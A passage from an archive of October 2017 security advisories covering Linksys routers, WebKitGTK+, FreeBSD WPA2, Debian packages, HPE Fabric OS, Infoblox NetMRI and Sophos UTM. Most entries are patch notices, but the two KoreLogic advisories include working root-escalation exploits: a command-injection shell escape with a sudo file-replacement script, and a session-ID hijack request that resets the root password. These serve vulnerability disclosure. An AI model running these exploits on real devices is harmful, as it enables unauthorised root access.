------------------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- Linksys E2500 - 3.0.02 (build 2) According to the Linksys security contact the following products are affected too: Linksys E900 (Version: 1.0.06) Linksys E1200 (Version: 2.0.07 Build 5) Linksys E8400 AC2400 Dual-Band Wi-Fi Router (Version: basic version ?) Based on information embedded in the firmware of other Linksys products gathered from our IoT Inspector tool we believe the following devices are affected as well: Linksys E900 (Version: 1.0.06) -- confirmed by vendor Linksys E900-ME (Version: 1.0.06) Linksys E1200 (Version: 2.0.07 Build 5) -- confirmed by vendor Linksys E1500 (Version: 1.0.06 Build 1) Linksys E3200 (Version: 1.0.05 Build 2) Linksys E4200 (Version: 1.0.06 Build 3) Linksys WRT54G2 (Version: 1.5.02 Build 5) Vendor contact timeline: ------------------------ 2017-07-10: Contacting vendor through security@linksys.com. Set release date to 2017-08-29. 2017-07-12: Confirmation of recipient. The contact also states that the unit is older and they have to look for it. 2017-08-07: Asking for update; Contact responds that they have to look for such a unit in their inventory. 2017-08-08: Contact responds that he verified three of four vulnerabilities. 2017-08-09: Sent PCAP dump and more information about vulnerability #4 to assist the contact with verification. 2017-08-18: Sending new advisory version to contact and asking for an update; No answer. 2017-08-22: Asking for an update; Contact states that he is trying to get a fixed firmware from the OEM. 2017-08-24: Asked the vendor how much additional time he will need. 2017-08-25: Vendor states that it is difficult to get an update from the OEM due to the age of the product ("Many of the engineers who originally worked on this code base are no longer with the company"). Clarified some CORS/SOP issues which were misunderstood. 2017-08-30: Sending Proof of Concept for CSRF/XSS as HTML files to the vendor. Changed the vulnerability description of the advisory to explain the possibility of exploiting the CSRF/XSS vulnerabilities from LAN and WAN side. 2017-09-07: Asking for an update; Vendor agrees with the new vulnerability descriptions and states that the OEM got back to them with a fix for the E2500 and they are in the QA phase. The vendor is expecting fixes for E900, E1200, and E8400 later this week or next week to hand them over to QA. 2017-09-07: Stated that E8400 was not found by the IoT Inspector because there was no firmware available to download online. Stated that it will be available in the next version of the advisory. Shifting the advisory release to 2017-09-26. Asking for confirmation of the other reported devices: Linksys E900-ME (Version: 1.0.06) Linksys E1500 (Version: 1.0.06 Build 1) Linksys E3200 (Version: 1.0.05 Build 2) Linksys E4200 (Version: 1.0.06 Build 3) Linksys WRT54G2 (Version: 1.5.02 Build 5) No answer. 2017-09-18: Sending new version of the advisory to the vendor. Asking for an update; No answer. 2017-09-21: Asking for an update; No answer. 2017-09-26: Asking for an update; No answer. 2017-10-02: Asking for an update and shifting the advisory release to 2017-10-09; No answer. 2017-10-16: Informing the vendor that the advisory will be released on 2017-10-18 because vendor is unresponsive. 2017-10-18: Public release of security advisory Solution: --------- Upgrade to new firmware version as soon as the vendor publishes it. Workaround: ----------- Restrict network access to the device. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF T. Weber / @2017

WebKitGTK+ Security Advisory WSA-2017-0008

------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2017-0008 ------------------------------------------------------------------------ Date reported : October 18, 2017 Advisory ID : WSA-2017-0008 Advisory URL : https://webkitgtk.org/security/WSA-2017-0008.html CVE identifiers : CVE-2017-7081, CVE-2017-7087, CVE-2017-7089, CVE-2017-7090, CVE-2017-7091, CVE-2017-7092, CVE-2017-7093, CVE-2017-7094, CVE-2017-7095, CVE-2017-7096, CVE-2017-7098, CVE-2017-7099, CVE-2017-7100, CVE-2017-7102, CVE-2017-7104, CVE-2017-7107, CVE-2017-7109, CVE-2017-7111, CVE-2017-7117, CVE-2017-7120, CVE-2017-7142. Several vulnerabilities were discovered in WebKitGTK+. CVE-2017-7081 Versions affected: WebKitGTK+ before 2.16.1. Credit to Apple. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A memory corruption issue was addressed through improved input validation. CVE-2017-7087 Versions affected: WebKitGTK+ before 2.18.0. Credit to Apple. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7089 Versions affected: WebKitGTK+ before 2.18.0. Credit to Anton Lopanitsyn of ONSEC, Frans Rosén of Detectify. Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management. CVE-2017-7090 Versions affected: WebKitGTK+ before 2.18.0. Credit to Apple. Impact: Cookies belonging to one origin may be sent to another origin. Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed by no longer returning cookies for custom URL schemes. CVE-2017-7091 Versions affected: WebKitGTK+ before 2.18.0. Credit to Wei Yuan of Baidu Security Lab working with Trend Micro’s Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7092 Versions affected: WebKitGTK+ before 2.18.0. Credit to Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team, Samuel Gro and Niklas Baumstark working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7093 Versions affected: WebKitGTK+ before 2.18.0. Credit to Samuel Gro and Niklas Baumstark working with Trend Micro’s Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7094 Versions affected: WebKitGTK+ before 2.16.3. Credit to Tim Michaud (@TimGMichaud) of Leviathan Security Group. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7095 Versions affected: WebKitGTK+ before 2.18.0. Credit to Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University working with Trend Micro’s Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7096 Versions affected: WebKitGTK+ before 2.18.0. Credit to Wei Yuan of Baidu Security Lab. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7098 Versions affected: WebKitGTK+ before 2.18.0. Credit to Felipe Freitas of Instituto Tecnológico de Aeronáutica. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7099 Versions affected: WebKitGTK+ before 2.16.4. Credit to Apple. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7100 Versions affected: WebKitGTK+ before 2.18.0. Credit to Masato Kinugawa and Mario Heiderich of Cure53. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7102 Versions affected: WebKitGTK+ before 2.18.0. Credit to Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7104 Versions affected: WebKitGTK+ before 2.18.0. Credit to likemeng of Baidu Secutity Lab. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7107 Versions affected: WebKitGTK+ before 2.18.0. Credit to Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7109 Versions affected: WebKitGTK+ before 2.18.0. Credit to avlidienbrunn. Impact: Processing maliciously crafted web content may lead to a cross site scripting attack. Description: Application Cache policy may be unexpectedly applied. CVE-2017-7111 Versions affected: WebKitGTK+ before 2.18.0. Credit to likemeng of Baidu Security Lab (xlab.baidu.com) working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7117 Versions affected: WebKitGTK+ before 2.18.0. Credit to lokihardt of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7120 Versions affected: WebKitGTK+ before 2.18.0. Credit to chenqin (陈钦) of Ant-financial Light-Year Security Lab. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7142 Versions affected: WebKitGTK+ before 2.16.1. Credit to an anonymous researcher. Impact: Website data may persist after a Safari Private browsing session. Description: An information leakage issue existed in the handling of website data in Safari Private windows. This issue was addressed with improved data handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, October 18, 2017

FreeBSD Security Advisory FreeBSD-SA-17:07.wpa [REVISED]

============================================================================= FreeBSD-SA-17:07.wpa Security Advisory The FreeBSD Project Topic: WPA2 protocol vulnerability Category: contrib Module: wpa Announced: 2017-10-16 Credits: Mathy Vanhoef Affects: All supported versions of FreeBSD. Corrected: 2017-10-17 17:30:18 UTC (stable/11, 11.1-STABLE) 2017-10-17 17:57:18 UTC (releng/11.1, 11.1-RELEASE-p2) 2017-10-17 17:56:03 UTC (releng/11.0, 11.0-RELEASE-p13) 2017-10-19 03:18:22 UTC (stable/10, 10.4-STABLE) 2017-10-19 03:20:17 UTC (releng/10.4, 10.4-RELEASE-p1) 2017-10-19 03:19:42 UTC (releng/10.3, 10.3-RELEASE-p22) CVE Name: CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, CVE-2017-13086, CVE-2017-13087, CVE-2017-13088 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . 0. Revision history v1.0 2017-10-17 Initial release. v1.1 2017-10-19 Add patches for 10.x releases. I. Background Wi-Fi Protected Access II (WPA2) is a security protocol developed by the Wi-Fi Alliance to secure wireless computer networks. hostapd and wpa_supplicant are implementations of user space daemon for access points and wireless client that implements the WPA2 protocol. II. Problem Description A vulnerability was found in how a number of implementations can be triggered to reconfigure WPA/WPA2/RSN keys (TK, GTK, or IGTK) by replaying a specific frame that is used to manage the keys. III. Impact Such reinstallation of the encryption key can result in two different types of vulnerabilities: disabling replay protection and significantly reducing the security of encryption to the point of allowing frames to be decrypted or some parts of the keys to be determined by an attacker depending on which cipher is used. IV. Workaround An updated version of wpa_supplicant is available in the FreeBSD Ports Collection. Install version 2.6_2 or later of the security/wpa_supplicant port/pkg. Once installed, update /etc/rc.conf to use the new binary: wpa_supplicant_program="/usr/local/sbin/wpa_supplicant" and restart networking. An updated version of hostapd is available in the FreeBSD Ports Collection. Install version 2.6_1 or later of the net/hostapd port/pkg. Once installed, update /etc/rc.conf to use the new binary: hostapd_program="/usr/local/sbin/hostapd" and restart hostapd. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart the Wi-Fi network interfaces/hostapd or reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Restart the Wi-Fi network interfaces/hostapd or reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.0-RELEASE, 11.1-RELEASE, and 11-STABLE] # fetch https://security.FreeBSD.org/patches/SA-17:07/wpa-11.patch # fetch https://security.FreeBSD.org/patches/SA-17:07/wpa-11.patch.asc # gpg --verify wpa-11.patch.asc [FreeBSD 10.3-RELEASE, 10.4-RELEASE, and 10-STABLE] # fetch https://security.FreeBSD.org/patches/SA-17:07/wpa-10.patch # fetch https://security.FreeBSD.org/patches/SA-17:07/wpa-10.patch.asc # gpg --verify wpa-10.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in . Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/11/ r324697 releng/11.0/ r324698 releng/11.1/ r324699 stable/10/ r324739 releng/10.3/ r324740 releng/10.4/ r324741 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: VII. References The latest revision of this advisory is available at

[SECURITY] [DSA 4002-1] mysql-5.5 security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-4002-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso October 19, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : mysql-5.5 CVE ID : CVE-2017-10268 CVE-2017-10378 CVE-2017-10379 CVE-2017-10384 Debian Bug : 878402 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.58, which includes additional changes, such as performance improvements, bug fixes, new features, and possibly incompatible changes. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details: https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-58.html http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html For the oldstable distribution (jessie), these problems have been fixed in version 5.5.58-0+deb8u1. We recommend that you upgrade your mysql-5.5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

[SECURITY] [DSA 4003-1] libvirt security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-4003-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso October 19, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : libvirt CVE ID : CVE-2017-1000256 Debian Bug : 878799 Daniel P. Berrange reported that Libvirt, a virtualisation abstraction library, does not properly handle the default_tls_x509_verify (and related) parameters in qemu.conf when setting up TLS clients and servers in QEMU, resulting in TLS clients for character devices and disk devices having verification turned off and ignoring any errors while validating the server certificate. More informations in https://security.libvirt.org/2017/0002.html . For the stable distribution (stretch), this problem has been fixed in version 3.0.0-4+deb9u1. For the unstable distribution (sid), this problem has been fixed in version 3.8.0-3. We recommend that you upgrade your libvirt packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

[security bulletin] HPESBHF03779 rev.1 - HPE Fabric OS using OpenSSH, Denial of Service

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03779en_us SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: hpesbhf03779en_us Version: 1 HPESBHF03779 rev.1 - HPE Fabric OS using OpenSSH, Denial of Service NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2017-10-17 Last Updated: 2017-10-17 Potential Security Impact: Local: Denial of Service (DoS); Remote: Denial of Service (DoS) Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY A remotely exploitable denial of service vulnerability has been identified in HPE Fabric OS (FOS) running OpenSSH. This impacts versions prior to FOS v7.4.2. References: - CVE-2016-6515 - OpenSSH SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - StoreFabric B-series Switches FOS prior to 7.4.2 BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2016-6515 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has provided an update to HPE Fabric OS. * FOS 7.4.2 and later. HISTORY Version:1 (rev.1) - 17 October 2017 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

[SECURITY] [DSA 4006-1] mupdf security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-4006-1 security@debian.org https://www.debian.org/security/ October 24, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : mupdf CVE ID : CVE-2017-14685 CVE-2017-14686 CVE-2017-14687 CVE-2017-15587 Debian Bug : 877379 879055 Multiple vulnerabilities have been found in MuPDF, a PDF file viewer, which may result in denial of service or the execution of arbitrary code. CVE-2017-14685, CVE-2017-14686, and CVE-2017-14687 WangLin discovered that a crafted .xps file can crash MuPDF and potentially execute arbitrary code in several ways, since the application makes unchecked assumptions on the entry format. CVE-2017-15587 Terry Chia and Jeremy Heng discovered an integer overflow that can cause arbitrary code execution via a crafted .pdf file. For the stable distribution (stretch), these problems have been fixed in version 1.9a+ds1-4+deb9u1. We recommend that you upgrade your mupdf packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

KL-001-2017-017 : Infoblox NetMRI Administration Shell Escape and Privilege Escalation

KL-001-2017-017 : Infoblox NetMRI Administration Shell Escape and Privilege Escalation Title: Infoblox NetMRI Administration Shell Escape and Privilege Escalation Advisory ID: KL-001-2017-017 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-017.txt 1. Vulnerability Details Affected Vendor: Infoblox Affected Product: NetMRI Affected Version: 7.1.2 - 7.1.4 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-272: Least Privilege Violation Impact: Root Access Attack vector: SSH 2. Vulnerability Description An authenticated user can escape the management shell and subsequently escalate to root via insecure file ownership and sudo permissions. 3. Technical Description The attacker begins by logging into the NetMRI CLI using a previously acquired or default admin account credential. $ ssh admin@1.3.3.7 NetMRI VM-AD30-5C6CE ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS. Last login: Mon Mar 13 15:04:37 2017 from 1.3.3.6 ************************************************************************ ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS. ************************************************************************ NetMRI Administrative Shell --------------------------- Available Commands: acl ftp md5sum register setup autoupdate grep more remoteCopy show cat halt netstat removedsb snmpwalk clear help ping removemib ssh-key configure installdsb provisiondisk repair supportbundle debug installhelpfiles quit reset telnet deregister installmib rdtclient restore tftpsync diagnostic license reboot rm top exit ls recalculate-spm route traceroute export maintenance refreshgroups set A bash command can then be encapsulated using the $() technique. In the case below, we simply call the bash binary. NetMRI-VM-AD30-5C6CE> ping $(/bin/bash) NOTE: Defaulting to MGMT network. Use -I to bind to a specific network... This places us in a new shell. This is the shell of a normal user who has been given access to a subset of commands using sudo. The admin and netmri accounts are permitted to execute various system commands from /bin/ and /usr/bin/ with any arguments sufficient to trivially escalate to root access such as /bin/cp, /bin/chmod, /bin/mv, /usr/sbin/find, etc., as well as some vendor-specific programs under /tools/. These can be used to escalate to root by overwriting /etc/shadow, creating a setuid shell, etc. In addition, numerous commands in users' home directories can be executed as root via sudo, such as multiple /home/admin/* commands runnable by user admin, and /home/reset/FactoryReset for user reset. One such example is runTop. runTop is a script which resides in the home directory of the admin user. In order to escalate privileges to root using a sudo-able command in a user's home directory, an attacker can move the real file, then create a malicious replacement and call it using sudo: [admin@NetMRI-VM-AD30-5C6CE Backup]$ cd /home/admin [admin@NetMRI-VM-AD30-5C6CE ~]$ mv /home/admin/runTop /home/admin/runTop.orig [admin@NetMRI-VM-AD30-5C6CE ~]$ echo '#!/bin/bash' > /home/admin/runTop [admin@NetMRI-VM-AD30-5C6CE ~]$ echo /bin/bash >> /home/admin/runTop [admin@NetMRI-VM-AD30-5C6CE ~]$ chmod a+x /home/admin/runTop [admin@NetMRI-VM-AD30-5C6CE ~]$ sudo /home/admin/runTop Now we have root. [root@NetMRI-VM-AD30-5C6CE ~]# id;uname -a uid=0(root) gid=0(root) groups=0(root) Linux NetMRI-VM-AD30-5C6CE 3.14.25.osib.7.1.0.20160929 #1 SMP Thu Sep 29 12:50:42 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux [root@NetMRI-VM-AD30-5C6CE ~]# The users admin, netmri, and reset all have similar NOPASSWD sudoers entries for scripts and/or binaries which the privilege escalation can be performed against. 4. Mitigation and Remediation Recommendation There is no known remediation of this vulnerability from the vendor. Administrators should heavily restrict access to any account of any privilege which can use the ping command in the NetMRI CLI. Network access to management interfaces should be properly segmented. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic requests security contact and PGP key from Infoblox. 2017.07.21 - Infoblox suggests 'security_support@infoblox.com' with PGP key id 0xC4AB2799. 2017.07.24 - KoreLogic submits vulnerability information to Infoblox. 2017.07.31 - 5 business days have elapsed since the vulnerability was reported. No response from Infoblox. 2017.09.15 - KoreLogic requests update from Infoblox. 2017.09.26 - 45 business days have elapsed since the vulnerability was reported to Infoblox. 2017.10.17 - KoreLogic requests an update from Infoblox. 2017.10.18 - 60 business days have elapsed since the vulnerability was reported to Infoblox. 2017.10.24 - KoreLogic public disclosure. 7. Proof of Concept Payload file (.a) #!/bin/bash mv /home/admin/runTop /home/admin/runTop.orig echo '#!/bin/bash' > /home/admin/runTop echo /bin/bash >> /home/admin/runTop chmod a+x /home/admin/runTop sudo /home/admin/runTop /bin/rm -rf /home/admin/runTop mv /home/admin/runTop.orig /home/admin/runTop /bin/rm -rf /var/home/admin/chroot-home/Backup/.a Exploit bash script #!/bin/bash TARGET_HOST=$2 TARGET_PORT=$3 TARGET_USER=$1 scp -P $TARGET_PORT netmri-privesc $TARGET_USER@$TARGET_HOST:.a ssh -p $TARGET_PORT $TARGET_USER@$TARGET_HOST 'ping $(/bin/bash .a)' The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Advisory ID: KL-001-2017-020 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges Impact: Root Access Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, it is possible to list a directory containing a sub-directories whose names are valid session identifiers (SID) and can be used to make requests on behalf of other accounts, such as admin. This allows for escalation to root privilege. 3. Technical Description 1. Obtain the a privileged session token $ ssh loginuser@1.3.3.7 loginuser@1.3.3.7's password: Sophos UTM (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved. Sophos is a registered trademark of Sophos Limited and Sophos Group. All other product and company names mentioned are trademarks or registered trademarks of their respective owners. For more copyright information look at /doc/astaro-license.txt or http://www.astaro.com/doc/astaro-license.txt NOTE: If not explicitly approved by Sophos support, any modifications done by root will void your support. loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/ loginuser@[redacted]:/var/confd/var/sessions > ls -la total 40 drwxr-xr-x 2 root root 4096 Mar 23 14:53 . drwxr-xr-x 5 root root 4096 Mar 19 16:06 .. -rw-r--r-- 1 root root 359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC -rw-r--r-- 1 root root 5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock -rw-r--r-- 1 root root 369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk -rw-r--r-- 1 root root 35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock -rw-r--r-- 1 root root 367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP -rw-r--r-- 1 root root 10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock -rw-r--r-- 1 root root 370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN -rw-r--r-- 1 root root 5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock 2. Set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:4444/ Content-Length: 418 Cookie: SID=xZzeOIhVClqKYsmCKHrN DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 14:57:19 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 24690 {"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba", [snip] "_cookie":null,"wdebug":0} 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released 